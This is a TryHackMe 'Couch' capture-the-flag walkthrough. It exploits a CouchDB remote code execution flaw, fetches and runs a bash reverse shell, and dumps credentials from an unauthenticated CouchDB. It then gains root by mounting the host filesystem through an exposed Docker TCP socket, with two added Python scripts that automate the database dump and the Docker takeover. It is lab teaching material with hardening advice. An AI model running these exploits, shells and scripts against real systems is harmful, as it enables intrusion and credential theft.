Couch TryHackMe Walkthrough
Hello guys, back again with another walkthrough. This time we are tackling the Couch box from TryHackMe. The box is a simple one, yet an amazing one; thanks to its creator, stuxnet. It starts with a port scan, which shows that the box has a CouchDB service exposed. Looking at the version, we find it is vulnerable to remote code execution; exploiting that gives us a shell on the box. That is one way in. The second way is to browse the database and discover credentials for the user atena. Since those credentials were reused, we can log in over SSH with them, and the user part is done. For root we exploit an unprotected Docker TCP socket to mount the host's / inside a container we create, which gives us read and write access to every file on the box. It was a really enjoyable box, so without much more to say, let's jump in.
As always, we start off with a port scan to identify the services that are externally exposed on the box. First I scanned the first 1000 ports, and looking at the results only one port was open: port 22.
We don't even have a web server, and SSH on its own presents very little attack surface. I know that this specific version of SSH is vulnerable to a user enumeration attack, but I kept that in the back of my mind and ran a full port scan to make sure I hadn't missed any other externally exposed service.
The full port scan shows one more open port: port 5984.
A script and service scan on the two ports identifies the service on 5984 as CouchDB.
Sweet. Looking that version up in exploit-db, we find it is vulnerable to remote code execution.
So we may have a way into the box. I copied the exploit into my current working directory.
Next I tried to run system commands through the exploit, but it just hung.
I never saw any output from the exploit, which made me think it might be blind. I wasn't sure, as this was my first time exploiting CouchDB, so I decided to test whether the command execution was blind. The easiest test for blind command injection is to make the target send a ping and watch for it arriving.
So I set up a tcpdump listener on my local box.
Then, using the exploit, I had the target ping my IP address.
The ICMP echo requests arriving in tcpdump confirm that the command executed, so this version really is vulnerable to remote code execution.
The next step is getting a shell on the box. I tried many payloads and kept finding that the special characters broke the exploit's command handling, so instead I wrote a bash reverse shell to a file, fetched it onto the box, and executed it from there.
First I created the reverse shell script on my box.
Then I started a simple HTTP server so the target (the Couch box) could download the file from me.
Next I used curl to pull the bash reverse shell down onto the target.
Then I set up a netcat listener for the target to connect back to.
And lastly I ran the exploit with the command
python3 44913.py --priv -c "bash /tmp/shell.sh" http://10.10.29.41:5984
Back on my netcat listener I had a shell on the box as the couchdb user.
Looking at the home directories, there is a user called atena, so the next step is to escalate our privileges to that user. I ran linpeas, but nothing stood out. CouchDB's home directory contains the database files, but they are stored in CouchDB's own on-disk format and cannot be read directly.
But we can query the databases through the CouchDB service itself. Just like with MySQL, we first need to list the databases, using the command
curl -X GET http://10.10.29.41:5984/_all_dbs
The command returns the databases on the instance, which we can read freely. We have this access because the service is not protected by any authentication mechanism at all (CouchDB calls this state "admin party": every anonymous request is treated as an administrator). Leaving a sensitive service like Redis, MySQL, CouchDB, MSSQL or SMB without authentication is strongly discouraged; always put some form of authentication in front of such services, and bind them to localhost or firewall them where possible, to prevent unauthorized access.
The database I was interested in was secret, since it is not one of CouchDB's standard databases.
Next I listed the documents inside the secret database using the command
curl -X GET http://10.10.29.41:5984/secret/_all_docs
The database holds a single document, with the id a1320dd69fb4570d0a3d26df4e000be7.
The next step was to read the contents of that document; I used the command
The result is a credential backup for the user atena. I tried logging in to the box via SSH (Secure Shell) with those credentials, and they worked: we have a shell on the box as atena.
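The database walk from the curl steps above, as one script. This is an added example and not code from the original walkthrough: it first asks GET /_session whether the anonymous caller already holds the _admin role (CouchDB's unauthenticated "admin party" state), then walks /_all_dbs, lists each database's /_all_docs, fetches every document and flags fields that look like credentials. It runs offline against a constructed stand-in for the target: the host, the database name and the document id mirror the post, while the document body and its password are invented. Give it a base URL as the first argument to run it against a live instance.

```python
"""Enumerate a CouchDB instance that has no authentication configured.

Added example, not code from the walkthrough. It issues the same requests
the post makes with curl (GET /_all_dbs, GET /<db>/_all_docs,
GET /<db>/<docid>) plus GET /_session, whose userCtx.roles tells you whether
the anonymous caller is already _admin. The transport is injected so the
logic can run offline against a constructed fake server; urllib_get() is
the real one.
"""
import json
import sys
import urllib.parse
import urllib.request
from urllib.error import HTTPError


def urllib_get(url):
    """Real transport: (HTTP status, parsed JSON body) for a GET."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status, json.loads(resp.read().decode())
    except HTTPError as e:
        return e.code, json.loads(e.read().decode() or "{}")


def anonymous_is_admin(base, get):
    """True when /_session reports the unauthenticated caller as _admin."""
    status, body = get(f"{base}/_session")
    return status == 200 and "_admin" in body.get("userCtx", {}).get("roles", [])


def dump_databases(base, get, include_system=False):
    """Return {db: {doc_id: document}} for every database we can read.

    Databases answering 401/403 are skipped, not fatal: a server can require
    auth on some databases (via their _security object) and not on others.
    System databases (_users, _replicator, ...) are skipped unless asked for.
    """
    status, dbs = get(f"{base}/_all_dbs")
    if status != 200:
        raise RuntimeError(f"_all_dbs returned {status}: {dbs}")
    result = {}
    for db in dbs:
        if db.startswith("_") and not include_system:
            continue
        status, listing = get(f"{base}/{db}/_all_docs")
        if status != 200:
            continue
        docs = {}
        for row in listing.get("rows", []):
            status, doc = get(f"{base}/{db}/{row['id']}")
            if status == 200:
                docs[row["id"]] = doc
        result[db] = docs
    return result


def find_credential_fields(dump, keywords=("pass", "pwd", "secret", "token", "key")):
    """Flag document fields whose name or value hints at a credential."""
    hits = []
    for db, docs in dump.items():
        for doc_id, doc in docs.items():
            for field, value in doc.items():
                if field.startswith("_"):          # _id / _rev metadata
                    continue
                if any(k in f"{field} {value}".lower() for k in keywords):
                    hits.append((db, doc_id, field, value))
    return hits


# Constructed offline stand-in for the target. Only the host, the database
# name and the document id mirror the post; the document body is invented.
FAKE_SERVER = {
    "/_session": (200, {"ok": True, "userCtx": {"name": None, "roles": ["_admin"]}}),
    "/_all_dbs": (200, ["_replicator", "_users", "secret"]),
    "/secret/_all_docs": (200, {"total_rows": 1, "offset": 0, "rows": [
        {"id": "a1320dd69fb4570d0a3d26df4e000be7",
         "key": "a1320dd69fb4570d0a3d26df4e000be7", "value": {"rev": "1-abc"}}]}),
    "/secret/a1320dd69fb4570d0a3d26df4e000be7": (200, {
        "_id": "a1320dd69fb4570d0a3d26df4e000be7", "_rev": "1-abc",
        "note": "credential backup", "user": "atena", "password": "not-the-real-one"}),
}


def fake_get(url):
    """Fake transport with the same (status, body) contract as urllib_get."""
    path = urllib.parse.urlsplit(url).path
    return FAKE_SERVER.get(path, (404, {"error": "not_found"}))


if __name__ == "__main__":
    live = len(sys.argv) > 1                        # e.g. http://10.10.29.41:5984
    base = sys.argv[1].rstrip("/") if live else "http://10.10.29.41:5984"
    get = urllib_get if live else fake_get
    print("anonymous caller is _admin:", anonymous_is_admin(base, get))
    dump = dump_databases(base, get)
    for db, doc_id, field, value in find_credential_fields(dump):
        print(f"{db}/{doc_id}: {field} = {value}")
```

The _session check is the one to run first on any CouchDB you find: if the anonymous userCtx carries _admin, every database, user document and configuration endpoint is yours without a password, which is exactly what made the secret database readable here.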
That's two ways of getting a shell on the box. Looking in atena's home directory, we find the user flag.
Next I uploaded linpeas to the box and ran it. linpeas is a bash script that checks for system misconfigurations that can lead to privilege escalation, and it is my go-to tool for privilege escalation checks on Linux systems.
In the linpeas output there is one port that is listening only on the loopback interface, which is why the external scans never saw it.
I forwarded this port back to my Linux box with an SSH local port forward over the session we already have; there was no need for chisel when SSH is already available.
Then, back on my local box, I ran a script and service scan against the forwarded port.
It came back as the Docker daemon's API, listening over plain TCP with no TLS and no authentication. Anyone who can reach that port can drive the daemon, which runs as root, so I used the well-known trick of starting a container with the host's root filesystem bind-mounted into it. That gives read and write access to every file on the host.
I ran the command
docker -H tcp://127.0.0.1:2375 run --rm -ti -v /:/mnt alpine chroot /mnt /bin/sh
Inside the chroot, /root holds the root flag, and since the bind mount is read-write we can also modify any file on the host, not just read it.
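What the docker command above does, spelled out against the Engine API so the misconfiguration is visible at the protocol level. This is an added example, not code from the original walkthrough: check_daemon() is the pre-flight test (an anonymous GET /version answering 200 is the problem), and run_on_host() creates a container whose HostConfig binds the host's / at /mnt, starts it, waits for it, reads its multiplexed log stream and removes it. The HTTP client is injected, so the flow runs offline against a constructed FakeDaemon whose "host filesystem" and flag text are invented; http_client() is the real transport for the forwarded port.

```python
"""Drive a Docker Engine API exposed on plain TCP (here the forwarded
127.0.0.1:2375) with no TLS and no authentication. Added example, not code
from the walkthrough: over raw HTTP it does what the docker command above does
(create a container with the host's / bound at /mnt, start it, wait, read its
multiplexed log stream, delete it) and runs offline against a constructed FakeDaemon."""
import json
import struct
import urllib.request
from urllib.error import HTTPError


def http_client(base="http://127.0.0.1:2375"):
    """Real transport: request(method, path, body) -> (status, raw bytes)."""
    def request(method, path, body=None):
        req = urllib.request.Request(
            base + path, method=method, headers={"Content-Type": "application/json"},
            data=None if body is None else json.dumps(body).encode())
        try:
            with urllib.request.urlopen(req, timeout=30) as resp:
                return resp.status, resp.read()
        except HTTPError as e:              # non-2xx still has a status and body
            return e.code, e.read()
    return request


def check_daemon(request):
    """Pre-flight: daemon version if GET /version answers anonymously, else None."""
    status, raw = request("GET", "/version")
    return json.loads(raw).get("Version") if status == 200 else None


def demux_docker_stream(raw):
    """Split the /logs stream: per frame a 1-byte stream id (1 stdout,
    2 stderr), 3 zero bytes, 4-byte big-endian payload length, payload."""
    out, err, pos = [], [], 0
    while pos + 8 <= len(raw):
        stream, length = raw[pos], struct.unpack(">I", raw[pos + 4:pos + 8])[0]
        (err if stream == 2 else out).append(raw[pos + 8:pos + 8 + length])
        pos += 8 + length
    return b"".join(out), b"".join(err)


def run_on_host(request, cmd, image="alpine"):
    """Run cmd in a container with the host filesystem bound read-write at
    /mnt; return (exit_code, stdout, stderr) and remove the container."""
    status, raw = request("POST", "/containers/create", {
        "Image": image, "Cmd": cmd, "HostConfig": {"Binds": ["/:/mnt"]}})
    if status != 201:
        raise RuntimeError(f"create failed: {status} {raw!r}")
    cid = json.loads(raw)["Id"]
    try:
        if request("POST", f"/containers/{cid}/start")[0] != 204:
            raise RuntimeError("start failed")
        exit_code = json.loads(request("POST", f"/containers/{cid}/wait")[1])["StatusCode"]
        out, err = demux_docker_stream(
            request("GET", f"/containers/{cid}/logs?stdout=true&stderr=true")[1])
    finally:
        request("DELETE", f"/containers/{cid}")
    return exit_code, out.decode(errors="replace"), err.decode(errors="replace")


def frame(stream, payload):                     # one frame in the daemon's wire format
    return bytes([stream, 0, 0, 0]) + struct.pack(">I", len(payload)) + payload


class FakeDaemon:
    """Constructed offline stand-in for the exposed daemon. It honours the bind
    mount only if the request asks for /:/mnt and only knows `cat <file>`."""
    def __init__(self, host_files):
        self.host_files, self.containers = host_files, {}   # constructed host fs

    def _run(self, cid):
        spec = self.containers[cid]
        cmd, binds = spec["Cmd"], spec.get("HostConfig", {}).get("Binds", [])
        mounted = cmd[0] == "cat" and cmd[1].startswith("/mnt/") and "/:/mnt" in binds
        content = self.host_files.get(cmd[1][len("/mnt"):]) if mounted else None
        if content is None:
            return 1, b"", b"cat: can't open '%s': No such file or directory\n" % cmd[1].encode()
        return 0, content, b""

    def __call__(self, method, path, body=None):
        if (method, path) == ("GET", "/version"):
            return 200, json.dumps({"Version": "19.03.0-fake"}).encode()
        if (method, path) == ("POST", "/containers/create"):
            cid = f"fake{len(self.containers)}"
            self.containers[cid] = body
            return 201, json.dumps({"Id": cid, "Warnings": []}).encode()
        cid = path.split("/")[2]
        if path.endswith("/start"):
            return 204, b""
        if path.endswith("/wait"):
            return 200, json.dumps({"StatusCode": self._run(cid)[0]}).encode()
        if "/logs" in path:
            _, out, err = self._run(cid)
            return 200, frame(1, out) + frame(2, err)
        if method == "DELETE":
            del self.containers[cid]
            return 204, b""
        return 404, b""
```

Against the forwarded port this is `request = http_client("http://127.0.0.1:2375")`, then `check_daemon(request)` and, if that returns a version, `run_on_host(request, ["cat", "/mnt/root/root.txt"])`; the same create call with a different Cmd writes to the host just as easily. Offline, `FakeDaemon({"/root/root.txt": b"<constructed root flag>\n"})` stands in for the daemon. The fix on the host side is to not bind the daemon to a TCP port at all, or to require TLS client certificates (dockerd's `--tlsverify`) and firewall the port.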
And that's the box done. I hope you enjoyed the walkthrough; if so, don't forget to clap for me below and follow me so you won't miss any upcoming articles.